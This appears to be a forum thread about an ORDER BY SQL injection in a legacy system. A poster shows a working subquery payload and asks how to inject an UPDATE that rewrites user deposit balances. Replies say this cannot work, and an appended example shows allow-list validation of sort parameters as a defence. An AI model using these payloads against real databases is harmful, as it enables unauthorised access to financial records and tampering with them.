I found an ORDER BY based SQL injection vulnerability in an old system that is still being maintained and wanted to verify it.
I first ran this injected SQL, and it works:
SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (select
case
when
(1=1)
then
1
else
(
select deposit
from sysuser_user_deposit
)end)=1 ASC LIMIT 20 OFFSET 0
But when I run this version, which carries an UPDATE statement, it errors out:
SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (select
case
when
(1=1)
then
1
else
(
update
sysuser_user_deposit
set
deposit=11)end)=1 ASC LIMIT 20 OFFSET 0
Error:
<code>#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'update
sysuser_user_deposit
set
deposit=11)end)=1 ASC LIMIT 20 OFFSET 0' at line 9</code>
How can I get it to execute the UPDATE?
When the outer statement is a SELECT, you cannot put an UPDATE inside it; it simply will not execute.
I have tried this kind of injection against MyBatis: running an UPDATE inside a &lt;select&gt; throws an error immediately, so it cannot be injected.
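The thread hinges on a sort parameter being spliced verbatim into the ORDER BY clause. The following is an added example, not code from this thread or from the system discussed, showing the defensive pattern that closes this class of bug: the user-supplied sort key and direction are mapped through an allow-list and only the vetted identifier is inlined, while LIMIT and OFFSET are bound parameters. The table name mirrors the thread; the column names, the allow-list and the sqlite in-memory fixture are constructed for the example.

```python
# Added example: allow-list validation of an ORDER BY parameter.
# Table name mirrors the thread; columns and allow-list are constructed.
import sqlite3

# Public sort keys -> real column names. Anything not in this map is rejected,
# so the sort expression can never be built from raw request input.
ALLOWED_SORT_COLUMNS = {
    "item_id": "item_id",
    "name": "item_name",
}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_item_query(sort_key: str, direction: str = "asc") -> str:
    """Return a SELECT whose ORDER BY comes only from the allow-list.

    Unknown keys or directions raise ValueError instead of being spliced into
    the SQL text, so a payload like "(select case when ... end)=1" is refused
    before it ever reaches the database.
    """
    try:
        column = ALLOWED_SORT_COLUMNS[sort_key]
        order = ALLOWED_DIRECTIONS[direction.lower()]
    except KeyError:
        raise ValueError(f"unsupported sort parameter: {sort_key!r} {direction!r}")
    # LIMIT/OFFSET are bound at execution time; only the vetted identifier is inlined.
    return f"SELECT item_id FROM sysitem_item ORDER BY {column} {order} LIMIT ? OFFSET ?"


def fetch_items(conn, sort_key, direction="asc", limit=20, offset=0):
    """Run the vetted query and return the ordered item ids."""
    sql = build_item_query(sort_key, direction)
    return [row[0] for row in conn.execute(sql, (limit, offset))]


def demo():
    """Show a legitimate sort succeeding and an injected sort key being rejected."""
    conn = sqlite3.connect(":memory:")  # constructed fixture, not the real schema
    conn.execute("CREATE TABLE sysitem_item (item_id INTEGER, item_name TEXT)")
    conn.executemany(
        "INSERT INTO sysitem_item VALUES (?, ?)", [(3, "c"), (1, "a"), (2, "b")]
    )
    ordered = fetch_items(conn, "item_id", "desc")
    try:
        # A subquery-style sort key of the kind seen in the thread never reaches SQL.
        fetch_items(conn, "(select case when (1=1) then 1 else 2 end)=1", "asc")
        rejected = False
    except ValueError:
        rejected = True
    return ordered, rejected


if __name__ == "__main__":
    print(demo())
```

The same idea applies to a MyBatis mapper: resolve the sort key to a column name in Java before the mapper is called, and pass only that resolved name into the `${}` substitution (or better, switch on it with `<choose>`), so the request parameter itself never becomes part of the statement text.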